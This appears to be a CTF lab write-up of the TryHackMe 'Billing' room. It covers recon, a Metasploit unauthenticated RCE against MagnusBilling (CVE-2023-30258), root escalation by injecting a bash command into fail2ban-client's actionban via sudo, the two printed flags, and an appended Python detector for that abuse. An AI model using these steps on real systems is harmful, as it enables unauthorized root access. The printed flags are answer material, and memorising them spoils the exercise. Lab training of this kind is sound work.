Hi everyone, today we’ll be solving this room called BILLING from TryHackMe. This room was fun to work on; I got to learn a bit more, and I honestly didn’t expect it to be this interesting, I don’t know why.
Anyway, here we are, and in this blog I’ll guide you through all the tough passages and lend a few tips/tricks here and there. ALRIGHT!!!!
Room: Billing
Difficulty: Medium
Objective: Gain initial access, escalate privileges, and retrieve user and root flags.
Note: Brute-forcing is not allowed.
Initial Recon – Nmap Scan
We start with a full version and script scan using:
nmap -A 10.10.2.74
Port | Service | Version | Details
---|---|---|---
22 | SSH | OpenSSH 9.2p1 | Debian
80 | HTTP | Apache 2.4.62 | /mbilling/ → MagnusBilling
3306 | MySQL | MariaDB | Unauthorized
Browsing to http://10.10.2.74/mbilling/ shows a MagnusBilling login page. We attempted default credentials (admin/admin, root/root, etc.), but none worked, and the page locks the source IP after 5 failed attempts (which is also why brute-forcing is off the table here).
Directory Enumeration with Gobuster
We ran gobuster to enumerate accessible directories and files:
gobuster dir -u http://10.10.2.74/mbilling/ -w /usr/share/wordlists/dirb/common.txt
And the results:
403 Forbidden:
/.hta
/.htaccess
/.htpasswd
/development.log
/production.log
/spamlog.log
/akeeba.backend.log
Accessible:
/archive/
/assets/
/fpdf/
/lib/
/resources/
/tmp/
/index.php
/LICENSE
The .log files looked juicy but returned 403, so they were inaccessible. We noted interesting folders like /tmp/ and /lib/ for later.
Exploiting MagnusBilling (RCE)
After searching online, we found an unauthenticated RCE vulnerability in MagnusBilling: CVE-2023-30258.
We launched Metasploit and loaded the exploit module:
msf6 > use exploit/linux/http/magnusbilling_unauth_rce_cve_2023_30258
msf6 exploit(...) > set RHOSTS 10.10.2.74
msf6 exploit(...) > set LHOST <YOUR_IP>
msf6 exploit(...) > run
And here are the results of the exploit:
[+] The target is vulnerable.
[*] Sending payload...
[*] Meterpreter session 1 opened!
We’re in!
Post-Exploit Enumeration
Once inside, our present working directory was:
/var/www/html/mbilling/lib/icepay
We explored back up to /var/www/html/mbilling/ and found a file: MagnusBilling-current.tar.gz
However, after analyzing it, this turned out to be a rabbit hole: nothing in the archive helped with escalation.
User Flag – Accessing Home Directory
We navigated to /home:
meterpreter > cd /home
meterpreter > ls
Found 3 users: debian, magnus, and ssm-user.
In /home/magnus/, we found:
user.txt → THM{4a6831d5f124b25eefb1e92e0f0da4ca}
SSH Credentials?
We also spotted a .ssh folder, so we spawned a proper interactive shell from the Meterpreter session:
shell
python3 -c 'import pty;pty.spawn("/bin/bash")'
export TERM=xterm
Using this shell, we determined (with id/whoami) that the session runs as the asterisk user, not magnus, so the .ssh folder was not ours to use.
Privilege Escalation (fail2ban abuse)
We checked sudo permissions with sudo -l:
User asterisk may run the following command without password:
(ALL) NOPASSWD: /usr/bin/fail2ban-client
Step-by-step Exploit (fail2ban-client lets you redefine the command a jail runs on ban, and that command runs as root):
Restart fail2ban:
sudo /usr/bin/fail2ban-client restart
Inject the command to copy the root flag:
sudo /usr/bin/fail2ban-client set sshd action iptables-multiport actionban "/bin/bash -c 'cp /root/root.txt /tmp/root.txt && chmod 777 /tmp/root.txt'"
Trigger the ban:
sudo /usr/bin/fail2ban-client set sshd banip 127.0.0.1
Retrieve the flag:
cat /tmp/root.txt
THM{33ad5b530e71a172648f424ec23fae60}
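From the blue-team side, the sudo rule above and the three fail2ban-client commands are both easy to catch. The following is an added example (not from the original writeup or the TryHackMe room): it runs a small detector over constructed sudo syslog lines that mirror the escalation steps, and audits constructed sudoers entries for the same unrestricted NOPASSWD grant. The host name, timestamps and the "ops" user are assumptions; the sudo log line format is the standard one sudo writes to syslog.

```python
"""Detect fail2ban action tampering via sudo, and audit sudoers for the weak rule.

Added example, not part of the original writeup. All log lines and sudoers
entries below are constructed for the demo; host name and timestamps are assumed.
"""
import re
import shlex

# fail2ban-client subcommands that replace the shell command a jail runs as root
# on the next ban/unban. A non-root user rewriting these is always worth an alert.
ACTION_HOOKS = {"actionban", "actionunban", "actionstart", "actionstop", "actioncheck"}

# Standard sudo syslog line: "<user> : TTY=... ; PWD=... ; USER=<target> ; COMMAND=<cmd>"
SUDO_RE = re.compile(
    r"sudo(?:\[\d+\])?:\s+(?P<user>\S+)\s+:.*?USER=(?P<target>\S+)\s+;\s+COMMAND=(?P<cmd>.+)$"
)

# Constructed sample: the sequence from the writeup, plus one benign status check.
SUDO_LOG_SAMPLE = [
    "Mar  3 10:41:07 billing sudo:   asterisk : TTY=pts/0 ; PWD=/home/magnus ; USER=root ; COMMAND=/usr/bin/fail2ban-client restart",
    "Mar  3 10:41:20 billing sudo:   asterisk : TTY=pts/0 ; PWD=/home/magnus ; USER=root ; COMMAND=/usr/bin/fail2ban-client set sshd action iptables-multiport actionban /bin/bash -c 'cp /root/root.txt /tmp/root.txt && chmod 777 /tmp/root.txt'",
    "Mar  3 10:41:31 billing sudo:   asterisk : TTY=pts/0 ; PWD=/home/magnus ; USER=root ; COMMAND=/usr/bin/fail2ban-client set sshd banip 127.0.0.1",
    "Mar  3 10:45:00 billing sudo:   debian : TTY=pts/1 ; PWD=/home/debian ; USER=root ; COMMAND=/usr/bin/fail2ban-client status sshd",
]

# Constructed sudoers sample: the rule found with sudo -l, and a narrowed replacement.
# sudoers matches listed arguments exactly, so the second rule only permits "status".
SUDOERS_SAMPLE = [
    "# constructed sample mirroring the rule from sudo -l",
    "asterisk ALL=(ALL) NOPASSWD: /usr/bin/fail2ban-client",
    "# hardened alternative: read-only subcommand only",
    "ops ALL=(root) NOPASSWD: /usr/bin/fail2ban-client status, /usr/bin/fail2ban-client status sshd",
]


def classify_fail2ban_command(cmd):
    """Label a fail2ban-client invocation, or return None if it is not interesting."""
    try:
        argv = shlex.split(cmd)
    except ValueError:  # unbalanced quotes in the logged command
        argv = cmd.split()
    if not argv or not argv[0].endswith("fail2ban-client"):
        return None
    args = argv[1:]
    if len(args) >= 5 and args[0] == "set" and args[2] == "action" and args[4] in ACTION_HOOKS:
        return "action-hook-rewrite"
    if len(args) >= 3 and args[0] == "set" and args[2] == "banip":
        return "manual-ban"
    if args and args[0] in ("restart", "reload", "stop"):
        return "daemon-control"
    return None


def scan_sudo_log(lines):
    """Return findings for sudo'd fail2ban-client commands, correlating rewrite + ban."""
    findings = []
    hook_rewritten_by = set()
    for line in lines:
        m = SUDO_RE.search(line)
        if not m:
            continue
        label = classify_fail2ban_command(m["cmd"])
        if label is None:
            continue
        severity = "low"
        if label == "action-hook-rewrite":
            severity = "high"
            hook_rewritten_by.add(m["user"])
        elif label == "manual-ban" and m["user"] in hook_rewritten_by:
            # A ban issued after the hook was replaced fires the injected command as root.
            label = "fail2ban-sudo-abuse"
            severity = "critical"
        findings.append({"user": m["user"], "target": m["target"],
                         "label": label, "severity": severity, "cmd": m["cmd"]})
    return findings


def audit_sudoers(lines):
    """Return (user, command) pairs granting fail2ban-client with no fixed arguments."""
    skip = ("Defaults", "Cmnd_Alias", "User_Alias", "Host_Alias", "Runas_Alias")
    weak = []
    for raw in lines:
        line = raw.split("#", 1)[0].strip()
        if not line or line.split()[0] in skip or "=" not in line:
            continue
        who, spec = line.split("=", 1)
        spec = re.sub(r"^\s*\([^)]*\)\s*", "", spec)      # drop "(runas)"
        spec = re.sub(r"^(?:[A-Z]+:\s*)+", "", spec)       # drop NOPASSWD: and friends
        for cmd in spec.split(","):
            parts = cmd.split()
            if not parts or not parts[0].endswith("fail2ban-client"):
                continue
            # No arguments (any subcommand allowed) or wildcarded arguments is the weak form.
            if len(parts) == 1 or any("*" in p for p in parts[1:]):
                weak.append((who.split()[0], cmd.strip()))
    return weak


if __name__ == "__main__":
    for f in scan_sudo_log(SUDO_LOG_SAMPLE):
        print(f"[{f['severity']}] {f['label']}: {f['user']} -> {f['target']}: {f['cmd']}")
    for user, cmd in audit_sudoers(SUDOERS_SAMPLE):
        print(f"[sudoers] {user} may run {cmd!r} with any arguments; restrict to a subcommand")
```

The correlation matters: a lone restart is noise, but an actionban rewrite followed by a manual banip from the same unprivileged user is the whole chain. The sudoers audit flags the rule exactly as it appears in sudo -l on the box; the fix is to list the one subcommand the service account actually needs, since sudoers only matches arguments when they are spelled out.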
Like I said, I enjoyed this room thoroughly; although it took me some time to finish, yeahhh, I love doing this.
Feel free to follow along or reach out if you want to try some other room together like this room too!
If you’re as passionate about Cyber-Security as I am, feel free to follow me on Twitter – @shrisec for the latest updates and connect with me on LinkedIn – Aditya Narayan to stay in the loop with my posts and insights in the upcoming projects and CTF writeups.
Let’s continue this fascinating journey together!